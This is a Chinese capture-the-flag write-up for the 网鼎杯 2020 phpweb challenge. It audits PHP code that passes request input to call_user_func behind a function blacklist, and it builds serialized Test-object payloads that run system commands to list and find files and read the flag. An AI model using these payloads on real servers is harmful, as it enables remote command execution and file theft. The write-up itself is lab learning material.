反序列化 [网鼎杯 2020 朱雀组]phpweb 1
打开题目
我们发现这个页面一直在不断的刷新
我们bp抓包一下看看
我们发现index.php用post方式传了两个参数上去,func和p
我们需要猜测func和p两个参数之间的关系,可以用php函数MD5测一下看看
我们在响应处得到了一串密文,md5解密一下看看
发现页面回响的内容就是123的md5加密后的内容
那我们直接看看能不能执行system函数
可以看到system函数被过滤掉了
那我们尝试一下能不能直接读取到网站源代码
file_get_contents()
得到
代码如下
<?php$disable_fun = array("exec","shell_exec","system","passthru","proc_open","show_source","phpinfo","popen","dl","eval","proc_terminate","touch","escapeshellcmd","escapeshellarg","assert","substr_replace","call_user_func_array","call_user_func","array_filter", "array_walk", "array_map","registregister_shutdown_function","register_tick_function","filter_var", "filter_var_array", "uasort", "uksort", "array_reduce","array_walk", "array_walk_recursive","pcntl_exec","fopen","fwrite","file_put_contents");function gettime($func, $p) {$result = call_user_func($func, $p);$a= gettype($result);if ($a == "string") {return $result;} else {return "";}}class Test {var $p = "Y-m-d h:i:s a";var $func = "date";function __destruct() {if ($this->func != "") {echo gettime($this->func, $this->p);}}}$func = $_REQUEST["func"];$p = $_REQUEST["p"];if ($func != null) {$func = strtolower($func);if (!in_array($func,$disable_fun)) {echo gettime($func, $p);}else {die("Hacker...");}}?>我们代码审计一下
$func = $_REQUEST["func"];
$p = $_REQUEST["p"];if ($func != null) { //判断func不为空
$func = strtolower($func); //将func转换为小写
if (!in_array($func,$disable_fun)) { //搜索func是否含有黑名单的值
echo gettime($func, $p); //如果func没有存在黑名单的值,就执行gettime函数
}else {
die("Hacker..."); //有则输出Hacker
function gettime($func, $p) {
$result = call_user_func($func, $p); //这里可以看出是回调函数
$a= gettype($result); //这里用gettype函数对result处理后赋值给a
if ($a == "string") { //如果a的类型是字符串
return $result; //返回reslut的结果
} else {return "";} //否则返回空值
那咱们就可以使用反序列化,因为我们这个命令是用不了的,func有很多黑名单限制
构造payload
<?php
class Test {var $p = "ls";var $func = "system";
}
$a = new Test();
echo serialize($a);
?>
用phpstudy打开得到payload
payload为
func=unserialize&p=O:4:"Test":2:{s:1:"p";s:2:"ls";s:4:"func";s:6:"system";}
得到
修改payload
func=unserialize&p=O:4:"Test":2:{s:1:"p";s:4:"ls /";s:4:"func";s:6:"system";}
还是没找到flag
继续修复payload,其中 flag* 是一个通配符,表示以 "flag" 开头的文件名。
func=unserialize&p=O:4:"Test":2:{s:1:"p";s:18:"find / -name flag*";s:4:"func";s:6:"system";}
直接读取flag
func=unserialize&p=O:4:"Test":2:{s:1:"p";s:22:"cat /tmp/flagoefiu4r93";s:4:"func";s:6:"system";}
或者readfile
func=readfile&p=/tmp/flagoefiu4r93
知识点
- 读取网站源代码的函数有
file_get_contents()
show_source()
highlight_file()
- strtolower()函数
在PHP中,字符串函数strtolower () 将字符串转化为小写
- in_array()函数
in_array() 函数搜索数组中是否存在指定的值。
- call_user_func函数
call_user_func — 把第一个参数作为回调函数调用
详情参考:PHP: call_user_func - Manual
- gettype函数
gettype()函数,必须先给它传递一个变量。它将确定变量的类型并且返回一个包含类型名称的字符串:bool、int、double、string、array、object和resource。如果变量类型不是标准类型之一,该函数就会返回“ unknown type(未知类型)”。
- 读取文件内容的命令
cat filename
readfile filename
- 查找文件的命令
详情见:Linux下查找文件(find、grep命令)_linux查找文件_GG_Bond19的博客-CSDN博客
find 路径 -name "文件名"
例如
find / -name flag*
其中
flag*是一个通配符,表示以 "flag" 开头的文件名。find / -name .*txt
其中
.*txt是一个通配符,表示以 ".txt" 结尾的隐藏文件
相关文章:
反序列化 [网鼎杯 2020 朱雀组]phpweb 1
打开题目 我们发现这个页面一直在不断的刷新 我们bp抓包一下看看 我们发现index.php用post方式传了两个参数上去,func和p 我们需要猜测func和p两个参数之间的关系,可以用php函数MD5测一下看看 我们在响应处得到了一串密文,md5解密一下看看 发…...
Java 何时会触发一个类的初始化
Java 何时会触发一个类的初始化? 使用new关键字创建对象访问类的静态成员变量 或 对类的静态成员变量进行赋值调用类的静态方法反射调用类时,如 Class.forName()初始化子类时,会先初始化其父类(如果父类还没有进行过初始化的话&a…...
我的记事本
url uniform resource locator. 统一资源定位符 请求状态码 1XX:信息响应 2XX:成功响应 3XX:重定向消息 4XX:客户端错误响应 5XX:服务器端错误响应 IP地址分类 本机回环IP地址:127.0.0.1 ~ 127.255.255.254 局域网IP(私网IP) 192.168.0.0 &am…...
)
GO设计模式——4、单例模式(创建型)
目录 单例模式(Singleton Pattern) 优缺点 使用场景 饿汉式和懒汉式单例模式 单例模式(Singleton Pattern) 单例模式(Singleton Pattern)是一个类只允许创建一个对象(或者实例ÿ…...
我对迁移学习的一点理解——领域适应(系列3)
文章目录 1. 领域适应(Domain Adaptation)的基本概念2.领域适应(Domain Adaptation)的目标3.领域适应(Domain Adaptation)的实现方法4.领域适应(Domain Adaptation)的可以解决的问题…...
【openssl】RSA 生成公钥私钥 |通过私钥获取公钥
通过博客:Window系统如何编译openssl 编译出openssl.exe(位于apps文件夹下)。 现在需要使用它获得公钥私钥、通过私钥获取公钥 目录 说明!!! 一.定位openssl.exe目录 二、进入命令cmd 三、生成私钥 …...
MongoDB的删除文档、查询文档语句
本文主要介绍MongoDB的删除文档、查询文档命令语句。 目录 MongoDB删除文档MongoDB查询文档 MongoDB删除文档 MongoDB是一种基于文档的NoSQL数据库,它使用BSON格式存储文档。删除文档是MongoDB数据库中的常见操作之一。 下面是MongoDB删除文档的详细介绍和示例&am…...
-trait)
Rust编程语言入门教程(三)-trait
文章目录 Rust编程语言入门教程(三)-trait什么是 trait?trait使用举例 Rust编程语言入门教程(三)-trait 什么是 trait? trait 是 Rust 中的接口,它定义了类型使用这个接口的行为。你可以类比到…...
LeetCode-1566. 重复至少 K 次且长度为 M 的模式【数组 枚举】
LeetCode-1566. 重复至少 K 次且长度为 M 的模式【数组 枚举】 题目描述:解题思路一:题意就是找出长度为m且连续重复k次的子数组。解题思路就是暴力枚举加剪枝。解题思路二:思路差不多解题思路三:0 题目描述: 给你一个…...
QT5.4.1无法打开文件
问题描述:起初是在QT代码中运行打开文件代码: QString gFilename QFileDialog::getOpenFileName(this,"open File",path,"*", nullptr,QFileDialog::DontUseNativeDialog);时,出现了堵塞情况,经过多次实验一…...
【1day】金和OA某接口存在未授权访问漏洞
注:该文章来自作者日常学习笔记,请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与作者无关。 目录 一、漏洞描述 二、影响版本 三、资产测绘 四、漏洞复现...
使用Rust 构建C 组件
协议解析,这不就很快了,而且原生的标准库红黑树和avl 树支持,异步tokio 这些库,编写应用组件就很快了 rust 标准库不支持 unix 的消息队列,但是支持 shm 和 uds,后者从多方面考虑都比,消息队列更…...
AI:大模型技术
Prompt Prompt(提示)是一种在人工智能领域,特别是在自然语言处理和聊天机器人中常用的技术。它是一种输入,用于激发人工智能模型生成相应的输出。在聊天机器人中,用户输入的问题或请求就是提示,而聊天机器…...
揭开WPF里面XAML可以通过http引入命名空间的神秘面纱
前言 做WPF开发这么久,其实一直对头部引入命名空间有些疑问,为啥官方提供的库通过xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"引入,而我自己开发的就只能通过 xmlns:local="clr-namespace:Darren.Wpf.MainModule.Views"来引入…...
什么是高防IP,高防IP该如何选择。
高防IP,指的是高防御能力的IP地址。在互联网的世界里,网络安全问题成为一个重要的话题。作为一个用户,你是否曾遇到过被黑客攻击造成的网站瘫痪、信息泄露等问题?如果你是一个企业,你是否考虑过自己公司的网站和业务的…...
Linux 进程
文章目录 进程定义进程的描述查看进程方法进程状态进程优先级进程相关概念补充 进程定义 大多数的说法:进程是计算机中正在运行的程序的实例。它是操作系统对程序的一种抽象,用于管理和调度程序的执行。 个人理解: 从OS(操作系统)开始说起,…...
Docker部署开源分布式任务调度平台DolphinScheduler并实现远程访问办公
文章目录 前言1. 安装部署DolphinScheduler1.1 启动服务 2. 登录DolphinScheduler界面3. 安装内网穿透工具4. 配置Dolphin Scheduler公网地址5. 固定DolphinScheduler公网地址 前言 本篇教程和大家分享一下DolphinScheduler的安装部署及如何实现公网远程访问,结合内…...
SQL语言重温
数据库语言重温 笔记背景SQL教程一些最重要的 SQL 命令SQL WHERE 子句SQL AND & OR 运算符SQL ORDER BY 关键字 笔记背景 由于工作需要,现重温简单SQL语言,笔记记录如下。 SQL教程 SQL(Structured Query Language:结构化查询语言&…...
Java学习手册——第五篇数据类型
数据类型:是数据化的基石,如果没有数据类型怎么表示呢?比如年龄可以用整数:18岁。如果有更好的表示方式大家可以留言哟~ 在举个例子就是姓名,我们需要用字符串的形式来表示。这就是数据类型的魅力,而又有同…...
机器学习算法性能评估常用指标总结
考虑一个二分问题,即将实例分成正类(positive)或负类(negative)。对一个二分问题来说,会出现四种情况。如果一个实例是正类并且也被 预测成正类,即为真正类(True positive࿰…...
XUnity Auto Translator:Unity游戏自动翻译的终极完整指南
XUnity Auto Translator:Unity游戏自动翻译的终极完整指南 【免费下载链接】XUnity.AutoTranslator 项目地址: https://gitcode.com/gh_mirrors/xu/XUnity.AutoTranslator XUnity Auto Translator是一款功能强大的开源游戏翻译工具,专为Unity引擎…...
)
CentOS 7上搞定Dell iDRAC Service Module安装报错(附usbutils依赖解决)
CentOS 7上解决Dell iDRAC Service Module安装依赖问题的实战指南 当你在CentOS 7系统上尝试安装Dell iDRAC Service Module时,可能会遇到各种依赖问题导致安装失败。本文将深入剖析最常见的usbutils依赖报错及其解决方案,同时提供一系列实用技巧帮助你顺…...
# 我花了一天,给 AI Coding Agent 搭了一个 Mini Harness
最近在折腾 AI Coding Agent(Claude Code / Cursor / 自定义 Agent)时,我发现一个很常见的问题:**模型会写代码,但不一定会“按流程工作”。**它可能:- 需求还没对齐,直接开始改代码 - 改着改着…...
USB外设概率性不识别问题详解
第一种情况,CPU主机端口下外接一个4口的扩展hub,但是扩展的hub端口概率性无法识别外设。如下log: 04-14 12:33:46.119450[ 18.884163] usb 3-1.2: new high-speed USB device number 4 using xhci-hcd 04-14 12:33:46.200327[ 18.964548]…...
武汉专升本民办 vs 公办机构怎么选
每年到了专科大三的春天,武汉的专升本备考群里总会出现类似的问题:“公办机构是不是比民办靠谱?”“民办会不会拿钱不办事?”“集训营到底该冲公办还是选民办?”说实话,这个问题没有标准答案,因…...
如何为 publiccode.asia 项目贡献代码:开发者入门指南
如何为 publiccode.asia 项目贡献代码:开发者入门指南 【免费下载链接】publiccode.asia-legacy Website of https://publiccode.asia 项目地址: https://gitcode.com/gh_mirrors/pu/publiccode.asia-legacy publiccode.asia 项目致力于推动公共资金资助的软…...
Java Web中基于JWT的七层权限控制系统设计
1. 为什么JWT不是“万能钥匙”,而是一个需要精心设计的权限信封在Java Web开发中,一提到权限控制,很多人第一反应就是“加个Spring Security,配个JWT,不就完事了?”我去年接手一个医疗SaaS系统的权限模块重…...
SQL Server报错注入原理与实战:从错误机制到WAF绕过
1. 报错注入不是“碰运气”,而是对SQL Server错误机制的精准利用很多人一听到“报错注入”,第一反应是“得看目标网站开不开错误提示”“得撞运气看有没有报错回显”。这种理解停留在表层,甚至会误导初学者放弃深入——其实恰恰相反ÿ…...
零和博弈 vs 正和系统:用强化学习原理破解组织内耗
1. 项目概述:从办公室茶水间到算法沙盒,零和与正和到底在争什么?你有没有经历过这样的场景:部门刚拿到一笔季度奖金池,五个人分三十万。A悄悄把B的客户案例写进自己的述职PPT;C在跨组协作时故意延迟交付&am…...
Meta 裁员约 8000 人:弥补 AI 巨额投资,削减人力成本
Meta 裁员:弥补 AI 投资缺口据报道,Meta 已通知数千名员工被裁员,此次裁员是为弥补其在人工智能方面的巨额投资。《商业内幕》分享的 Meta 管理层邮件显示,这是公司“持续努力提高运营效率、平衡其他投资的举措之一”。裁员规模与…...